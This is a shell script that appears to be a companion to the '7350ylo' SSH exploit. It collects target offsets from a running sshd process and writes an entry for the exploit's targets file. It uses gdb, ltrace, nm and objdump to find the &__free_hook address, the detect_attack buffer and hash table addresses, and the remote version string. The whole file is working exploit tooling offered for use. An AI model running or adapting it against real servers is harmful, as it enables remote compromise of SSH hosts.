#!/bin/sh

# ./7350ylo -T <ip>
# wait until "run script now" is displayed
#
# then:
# usage: ./find-offsets.sh /usr/sbin/sshd1 <pid-of-client-connected-sshd>

check_util ()
{
	for util in $*; do
		echo -n "checking for $util: "
		if ! which $util; then
			echo "not found, aborting"
			exit
		fi
	done
}

echo "7350ylo offset script -sc."
echo

if [ $# != 2 ]; then
	echo "usage: $0 /path/to/sshd/binary pid-of-running-sshd"
	echo
	echo "use 7350ylo with -T mode, it will tell you when to run this"
	echo
	exit
fi;

check_util md5sum gdb nm ltrace strace objdump awk
echo


# md5sum
SSHD_MD5=`md5sum $1 | awk '{ print $1 }'`

# &__free_hook
LIBC_PATH=`cat /proc/$2/maps | grep "xp" | grep "libc-" | \
	awk '{ print $6 }'`
if nm $LIBC_PATH 2>&1 | grep "no symbols" >/dev/null; then
	echo "$LIBC_PATH has no symbols using GDB method to find &__free_hook"

	FREE_HOOK=`gdb --command=./find-free-hook.gdb $1 $2 2>&1 | \
		egrep " 0x" | cut -d '*' -f2- | cut -d ' ' -f2`
else
	echo "$LIBC_PATH has symbols, using remap-method to find &__free_hook"
	LIBC_MAPBASE=`cat /proc/$2/maps | grep "r-xp" | grep "libc-" | \
		cut -d '-' -f1`
	LIBC_FHRELOFS=`nm $LIBC_PATH 2>&1 | grep __free_hook | awk '{ printf ("0x%s", $1) }'`
	FREE_HOOK=`echo $LIBC_MAPBASE $LIBC_FHRELOFS | \
		awk '{ printf ("0x%08x", $1 + $2) }'`
fi;
echo "/* &__free_hook */ $FREE_HOOK"

rm -f out
ltrace -p $2 --output=out &

BSS_SIZE=`objdump -h $1 | grep " \.bss" | awk '{ printf ("0x%s", $3) }'`
BSS_BASE=`objdump -h $1 | grep " \.bss" | awk '{ printf ("0x%s", $4) }'`

rm -f dump-bss.gdb
echo "cont" > dump-bss.gdb
echo $BSS_SIZE $BSS_BASE | awk '{ printf ("x/%db 0x%08x\n", $1, $2) }' >> dump-bss.gdb
echo "q" >> dump-bss.gdb
echo "y" >> dump-bss.gdb

#rm -f output
#(screen gdb --command=./dump-bss.gdb $1 $2 2>&1 > output) &

echo
echo "# now press enter at the 7350ylo test console"
echo "# then, after the ssh process has segfaulted, press enter here (not before)"
echo "# (if you are unsure when, wait until 7350ylo has exited completely"
read

#echo
#echo "# waiting for GDB to dump .bss section, may take a few seconds"
#wait
#echo "/* &input->alloc */" `egrep "0x03.+0x00.+0x04.+0x00.+0x00.+0x00" output`

REMOTE_VERSION=`egrep " sscanf\(0xbfff.+\) = 3" out | \
	cut -d '(' -f2- | cut -d ')' -f1 | \
	cut -d ',' -f5 | awk '{ print $1 }'`
echo "/* remote version */ $REMOTE_VERSION"

DEATTACK_BUF=`egrep " realloc\(.+20...." out | \
	tail -2 | head -1 | \
	cut -d '=' -f2- | cut -c 2- | \
	awk '{ printf ("0x%08x", $1 + 4) }'`
echo "/* detect_attack, buf */ $DEATTACK_BUF"

FREE_HOOK_HW=`echo $DEATTACK_BUF | cut -c -6 | \
	awk '{ printf ("0x%04x", $1 + 2) }'`

DEATTACK_H=`egrep " malloc\(0[\),]" out | cut -d '=' -f2- | cut -c 2-`
echo "/* detect_attack, h */ $DEATTACK_H"

DEATTACK_H_LOW=`echo $DEATTACK_H | cut -c -6 | \
	awk '{ printf ("0x%04x0000", $1 - 2) }'`
DEATTACK_H_HIGH=`echo $DEATTACK_H | cut -c -6 | \
	awk '{ printf ("0x%04x0000", $1 + 2) }'`

echo
echo "add this line to targets file"
echo "NEW,VERSION,$SSHD_MD5,$REMOTE_VERSION,?,$FREE_HOOK,$DEATTACK_BUF,$DEATTACK_H,$DEATTACK_H_LOW,$DEATTACK_H_HIGH,$FREE_HOOK_HW"
echo

